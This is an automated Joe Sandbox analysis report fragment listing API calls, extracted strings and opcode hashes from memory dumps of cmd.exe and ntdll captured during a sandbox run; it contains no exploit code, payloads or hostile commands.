                                                                                        • API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
                                                                                        • String ID: COPYCMD
                                                                                        • API String ID: 1068965577-3727491224
                                                                                        • Opcode ID: a4b96e1c16dede699297014472218aaf07c7aa044d3a31cb538c57108c229a3e
                                                                                        • Instruction ID: 0687600dc898cf97427ef8752255c5a8bed159ec52a3ec341e0f01b3276b472c
                                                                                        • Opcode Fuzzy Hash: a4b96e1c16dede699297014472218aaf07c7aa044d3a31cb538c57108c229a3e
                                                                                        • Instruction Fuzzy Hash: FED1E535A002159BCB29EF68C895ABAB7F1EF58300F598569D84AD7381FB30ED45CB70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _setjmp3.MSVCRT ref: 00D64E78
                                                                                          • Part of subcall function 00D68E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00DA8BF0,00000000,?), ref: 00D68EC3
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                        • NtQueryInformationProcess.NTDLL ref: 00D64F28
                                                                                        • NtSetInformationProcess.NTDLL ref: 00D64F46
                                                                                        • NtSetInformationProcess.NTDLL ref: 00D64FAE
                                                                                        • longjmp.MSVCRT(00DA0A30,00000001,00000000), ref: 00D791C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
                                                                                        • String ID: %9d
                                                                                        • API String ID: 4212706909-2241623522
                                                                                        • Opcode ID: 7cb2a33bf3dea03527107bea70f63bd14fec1fa970d77459e92e0c16b4b55d5d
                                                                                        • Instruction ID: ab46856b3eed9c6a3d6b82fef21dc823372cc06b869ca95f30a10aa5db56dc06
                                                                                        • Opcode Fuzzy Hash: 7cb2a33bf3dea03527107bea70f63bd14fec1fa970d77459e92e0c16b4b55d5d
                                                                                        • Instruction Fuzzy Hash: D541B3B1E04315AFD710DFA99C45A6AFBF4EB85724F14421AFA54D7390EBB08900DBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 03ADD0E6
                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 03ADD263
                                                                                        • @, xrefs: 03ADD09D
                                                                                        • @, xrefs: 03ADD24F
                                                                                        • Control Panel\Desktop\LanguageConfiguration, xrefs: 03ADD136
                                                                                        • @, xrefs: 03ADD2B3
                                                                                        • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 03ADD06F
                                                                                        • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 03ADD202
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                        • API String ID: 0-1356375266
                                                                                        • Opcode ID: 14087f8f2b8c6bfc67e40c782552f6fec990d765317030233c3a462f0f7d17b3
                                                                                        • Instruction ID: 9b50a93eba5169b8f146b638698fb5f4b408ed94c5800b59123f04dae0878a28
                                                                                        • Opcode Fuzzy Hash: 14087f8f2b8c6bfc67e40c782552f6fec990d765317030233c3a462f0f7d17b3
                                                                                        • Instruction Fuzzy Hash: DAA178B15083159FD721DF24C480BABBBE8FF85719F014A6EF5999A240E774D908CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D67A9C
                                                                                        • memset.MSVCRT ref: 00D67AC7
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D67BCA
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D67BDC
                                                                                        • longjmp.MSVCRT(00DA0A30,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 00D7AE5B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$Heap$AllocProcesslongjmp
                                                                                        • String ID:
                                                                                        • API String ID: 2656838167-0
                                                                                        • Opcode ID: 0b667347dd341f4c8a4dfbf30d8c49eac506053e3c269b0c8310ba4798bcdf6f
                                                                                        • Instruction ID: 64f611adf15716817cc93175558c99b543b70a16194a50110f81a8bb74a2af9b
                                                                                        • Opcode Fuzzy Hash: 0b667347dd341f4c8a4dfbf30d8c49eac506053e3c269b0c8310ba4798bcdf6f
                                                                                        • Instruction Fuzzy Hash: F4D1C571A042199FCB38DF28C8917AEB7B1EF44704F58419DE54A97681EB70AE80CFB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID:
• API String ID: 3168844106-0
• Opcode ID: 5f0b8fd78f6bb01969673ecd325efbd90d62c5fa7c1890e5a2ac50d594178783
• Instruction ID: 5840ade05e96978147a7ac09832a88adcc5f4033a9cf7419bf93c2f7da2470bd
• Opcode Fuzzy Hash: 5f0b8fd78f6bb01969673ecd325efbd90d62c5fa7c1890e5a2ac50d594178783
• Instruction Fuzzy Hash: 3CC1A1356043058BC718EF28D851A6AB7E2EFD9704F18892DF88A87351FB31D945CBB2
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,00000000), ref: 00D70297
• FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D702B0
• memcpy.MSVCRT ref: 00D70311
• _wcsnicmp.MSVCRT ref: 00D70367
• _wcsicmp.MSVCRT ref: 00D7E746
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
• String ID:
• API String ID: 242869866-0
• Opcode ID: c0f130b46ed5d6ec9e5b6f5cc9158ebac6548053761e54ee80faa9dd90c6da7b
• Instruction ID: e621e1b28f3909af62c244d471909d36ab7f9e88392a5c352982e6150473b1ee
• Opcode Fuzzy Hash: c0f130b46ed5d6ec9e5b6f5cc9158ebac6548053761e54ee80faa9dd90c6da7b
• Instruction Fuzzy Hash: 05518F76608311CBC724DF28D84856BBBE5EFC8710F198A1EF889C7290E771D905CBA6
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
• Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
Similarity
• API ID:
• String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
• API String ID: 0-523794902
• Opcode ID: 16df0cd4e710329ab8978bc76bbbd017ac49730f4d87866af38b10aa060f080d
• Instruction ID: 697bb6eb3640fef895635c07d644bf24ce212ad3defda0162aa15584914546a6
• Opcode Fuzzy Hash: 16df0cd4e710329ab8978bc76bbbd017ac49730f4d87866af38b10aa060f080d
• Instruction Fuzzy Hash: A442DA352093819FC715DF28C984A6BBBE5FF89608F0849AEF8978B352D730D945CB52
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
• Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
Similarity
• API ID:
• String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
• API String ID: 0-122214566
• Opcode ID: 69f9a9e11bff75cd4051b3cb1a9f9a2ddf0cd28d12522397da5dbf7eecbece9e
• Instruction ID: 720e61a8ce467cf7be6bbaf21f0fc6a4a3f90cab03eb5c2f8720d72e63ad276d
• Opcode Fuzzy Hash: 69f9a9e11bff75cd4051b3cb1a9f9a2ddf0cd28d12522397da5dbf7eecbece9e
• Instruction Fuzzy Hash: 49C12675E00715AFDB18DBA8C890BBEB7B5AF45704F1841ABFA02EB291D770D944C3A0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
  • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
• wcstol.MSVCRT ref: 00D708D9
• wcstol.MSVCRT ref: 00D708F3
• wcstol.MSVCRT ref: 00D7090B
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: wcstol$Heap$AllocProcess
• String ID:
• API String ID: 2343214347-0
• Opcode ID: a66ab0bfeda3d97d8a15441a18f1d550038825162f64abd308f27f338ae40ac3
• Instruction ID: 8d0204f7b19a67355affe33e5cc0f99ca7272c2e59e8ab628f53f565299f341a
• Opcode Fuzzy Hash: a66ab0bfeda3d97d8a15441a18f1d550038825162f64abd308f27f338ae40ac3
• Instruction Fuzzy Hash: F9A1A171A00214CBDB24EFA9D85597EBBB6EF48304B18802DE949DB395EB70DC01CBB1
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
  • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
• _pipe.MSVCRT ref: 00D66B4F
• _get_osfhandle.MSVCRT ref: 00D66BF7
• DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00D66C05
  • Part of subcall function 00D6E950: memset.MSVCRT ref: 00D6E9A0
  • Part of subcall function 00D6E950: wcschr.MSVCRT ref: 00D6E9FC
  • Part of subcall function 00D6E950: wcschr.MSVCRT ref: 00D6EA14
  • Part of subcall function 00D6E950: _wcsicmp.MSVCRT ref: 00D6EA80
• ??_V@YAXPAX@Z.MSVCRT ref: 00D66D8F
• longjmp.MSVCRT(00DA0A30,00000001), ref: 00D7A6D8
  • Part of subcall function 00D6A1A8: _dup.MSVCRT ref: 00D6A1AF
  • Part of subcall function 00D6A1D6: _dup2.MSVCRT ref: 00D6A1EA
  • Part of subcall function 00D6A16C: _close.MSVCRT ref: 00D6A19B
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
• String ID:
• API String ID: 1441200171-0
• Opcode ID: 4f22a38a6acc8037dda21ddcc06b9f911c6e03da82a300d60864f9cc86c45f7b
• Instruction ID: 0955373f9cd80fe34419b99110c75d0281f35b44572b1eb9df11eef1c5cc63ef
• Opcode Fuzzy Hash: 4f22a38a6acc8037dda21ddcc06b9f911c6e03da82a300d60864f9cc86c45f7b
• Instruction Fuzzy Hash: B69176756007049FDB24EF29D896A2E77A1EB89320F19852EE45AD7391EB30EC41CF71
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
• Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
Similarity
• API ID:
• String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
• API String ID: 0-792281065
• Opcode ID: b8c68cdb0e0410cbff2376bb6e8caa2102d60cf80a5685faa90751b3d978617f
• Instruction ID: 92903fa77a4b24ec8f90ea06f70e1167b0fc5495b1ea8ff3be77aa10b7046e46
• Opcode Fuzzy Hash: b8c68cdb0e0410cbff2376bb6e8caa2102d60cf80a5685faa90751b3d978617f
• Instruction Fuzzy Hash: A5916735A023549FDB24EF18D915BAD7BA4EB0171CF5800FAFD05AF285E7B09851CB91
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
• Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
• API String ID: 0-1745908468
• Opcode ID: c581d33b51545b4713f7fae2ece74211af0c061589053d783112746f75c26e73
• Instruction ID: b19f7c1cb0204f260fc88eabd9a7c10054239bfaaf4b57df05f71f4140b5ddb6
• Opcode Fuzzy Hash: c581d33b51545b4713f7fae2ece74211af0c061589053d783112746f75c26e73
• Instruction Fuzzy Hash: E891E039A01745DFCB15FFA8E440AADFBF1FF49718F1880AAE446AB652C7759A40CB10
Uniqueness
Uniqueness Score: -1.00%

Strings
• Kernel-MUI-Language-SKU, xrefs: 03B0534B
• Kernel-MUI-Language-Allowed, xrefs: 03B0519B
• WindowsExcludedProcs, xrefs: 03B0514A
• Kernel-MUI-Number-Allowed, xrefs: 03B05167
• Kernel-MUI-Language-Disallowed, xrefs: 03B05272
Memory Dump Source
• Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
• Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
Similarity
• API ID:
• String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
• API String ID: 0-258546922
• Opcode ID: 4587be1e412f88a9417d5d45dcfdcd23bb6d775696d7518d6f87b0c991324ac0
• Instruction ID: e9a9a12c42b89cb4cc44fa24286b8b36c5b860ea1b1e807f25041a4971bd111e
• Opcode Fuzzy Hash: 4587be1e412f88a9417d5d45dcfdcd23bb6d775696d7518d6f87b0c991324ac0
• Instruction Fuzzy Hash: B0F13D76D04218EFCB21DF99C980AEEBBBCFF49654F1441ABE505EB650E7709E018B90
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00D76C76,00D61000), ref: 00D76B47
• UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00D76C76,?,00D76C76,00D61000), ref: 00D76B50
• GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00D76C76,00D61000), ref: 00D76B5B
• TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00D76C76,00D61000), ref: 00D76B62
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
• String ID:
• API String ID: 3231755760-0
• Opcode ID: 3781054b100c785f6384a311a87964b180fe66522cd4fed253c5498072a7baff
• Instruction ID: ef3858abeb8df7a07861dfebbd9d50562c3daa0ec07384c0394ea04935f16f4a
• Opcode Fuzzy Hash: 3781054b100c785f6384a311a87964b180fe66522cd4fed253c5498072a7baff
• Instruction Fuzzy Hash: 4DD0C972040304ABCA012BE9EC0CB493F28EB8A252F014100F30DC6261CB364811CB7F
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
• Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
Similarity
• API ID:
• String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
• API String ID: 0-379654539
• Opcode ID: 37302742e7e9e69076fb7b440188be188c71f56059b9ab47d36ea3880afd4af0
• Instruction ID: 6ded06db4e3dc2b0d95b381763d8ec19cb6fd3479a3570c0233a1b7911817515
• Opcode Fuzzy Hash: 37302742e7e9e69076fb7b440188be188c71f56059b9ab47d36ea3880afd4af0
• Instruction Fuzzy Hash: B4C16B752083828FC721CF58C584B6AB7F4FF85704F0489AAF8968B250E734D94ADB66
Uniqueness
Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        • LdrpInitializeProcess, xrefs: 03B18342
                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 03B1847E
                                                                                        • @, xrefs: 03B184B1
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 03B18341
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-1918872054
                                                                                        • Opcode ID: 984662e93af4c0bc60f4f2b11274d85a57c2414e577720a94a64e4dca8e43731
                                                                                        • Instruction ID: eaf24f6fc8272fd765ba45f42e0fe1bc83ee3e7658c26e7a733fdc2f011ae004
                                                                                        • Opcode Fuzzy Hash: 984662e93af4c0bc60f4f2b11274d85a57c2414e577720a94a64e4dca8e43731
                                                                                        • Instruction Fuzzy Hash: FC918A71108340AED721DB65C941FABBBECFB84748F4409BEFA89CA141E734D954CB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 03B40E2F
                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 03B40E72
                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 03B40DEC
                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 03B40EB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                        • API String ID: 0-1468400865
                                                                                        • Opcode ID: 717000bee3b34f70a7cdd5fe701a98873901393b20cefabd0bf6cd637b1ef5e7
                                                                                        • Instruction ID: f4493f5910473e4a1125bd6fb18944fbfdcd7c56e00333bdf4554ec781a0c75b
                                                                                        • Opcode Fuzzy Hash: 717000bee3b34f70a7cdd5fe701a98873901393b20cefabd0bf6cd637b1ef5e7
                                                                                        • Instruction Fuzzy Hash: FB71E276904304AFCB60EF14C984B9B7FACEFA5758F0409B9F9498B156D334D588CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 03B4A79F
                                                                                        • apphelp.dll, xrefs: 03B02382
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 03B4A7AF
                                                                                        • LdrpDynamicShimModule, xrefs: 03B4A7A5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-176724104
                                                                                        • Opcode ID: 07a4c38c7de3ac4b6c05215ba030266e8aa39fb6562bb28ca3da31d3ec818366
                                                                                        • Instruction ID: 45fa0d89269fe65623e6afac2f0675d4795e72fdbc104b4bc004ade8648bc253
                                                                                        • Opcode Fuzzy Hash: 07a4c38c7de3ac4b6c05215ba030266e8aa39fb6562bb28ca3da31d3ec818366
                                                                                        • Instruction Fuzzy Hash: 0E314A39A41200AFDB20EF18DA95F6DB7B4FB84B0CF1800FAE9056B655E7705951DB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                        • API String ID: 0-1391187441
